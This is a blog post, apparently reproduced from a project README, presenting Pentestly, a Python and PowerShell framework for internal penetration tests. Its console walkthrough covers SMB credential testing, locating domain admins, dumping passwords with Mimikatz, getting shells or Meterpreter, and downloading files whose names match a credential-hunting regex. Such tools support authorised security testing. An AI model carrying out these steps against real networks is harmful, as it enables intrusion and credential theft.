Wednesday, 24 February 2016
0 comments

Pentestly- A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool


Pentestly is a tool for penetration tests. It is a combination of expanding Python tools. 

The main aim of the Pentestly tool is to utilize the familiar user interface. With the power of Python, the contribution to the framework should be easy. Pentestly utilizes the power of Python, Powershell etc tools together in a familiar user experience.

Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation

wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI

smbmap.py - Useful utility for enumerating SMB shares

Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell

powercat.ps1 - Netcat-esque functionality in Powershell

Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell

CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly


Features of Pentestly:


  1. mport NMAP XML
  2. Test SMB authentication using:


  • individual credentials
  • file containing credentials
  • null credentials
  • NTLM hash


  1. Test local administrator privileges for successful SMB authentication
  2. Identify readable SMB shares for valid credentials
  3. Store Domain/Enterprise Admin account names
  4. Determine location of running Domain Admin processes
  5. Determine systems of logged in Domain Admins
  6. Execute Powershell commands in memory and exfil results
  7. Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
  8. Receive a command shell (Powercat)
  9. Receive a meterpreter session (Invoke-Shellcode.ps1)


How you can install it:

For installation you need to follow these steps or commands:

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly


How you can use it:

Step1 [pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project


Step 2- Load from nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

Name              Current Value                  Required    Description
--------          -------------                  --------    -----------
FILENAME  /root/PROJECT/full-all-alive.xml         yes        Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Step 3- Test logins

For test logins use file with creds 

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Single username & password must be used

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a small subset of IPs 

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Step 4- Domain and Enterprise admins must be Gather

[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

Name    Current Value  Required  Description
------  -------------  --------  -----------
SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2


Step 6-Mimikatz should be run over IPs with executable rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
For hosting scripts select the  local interface 

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:[email protected]$$w0rd  - DOMAIN ADMIN!

Step 7- Show local admins

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Step 8-Show domain admins

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Step 9-Enumshares:

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Step 10-Show new shares:

[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Step 11-Find/Download interesting files

[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
-------  -------------                                                         ---------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    yes       source of input (see 'show info' for details)

Can change the pattern to something a bit more specialized

[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)

Execute and download found files

[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt


Contributing:

Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:

from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print the successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module

TODO

  • Implement secretsdump.py module
  • Add utility functions for database queries similar to creds, services
  • Rework draw_table function to have fixed width columns
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module
  • Look into utilizing Invoke-Shellcode

0 comments:

Post a Comment

Note: only a member of this blog may post a comment.

 
Toggle Footer
Top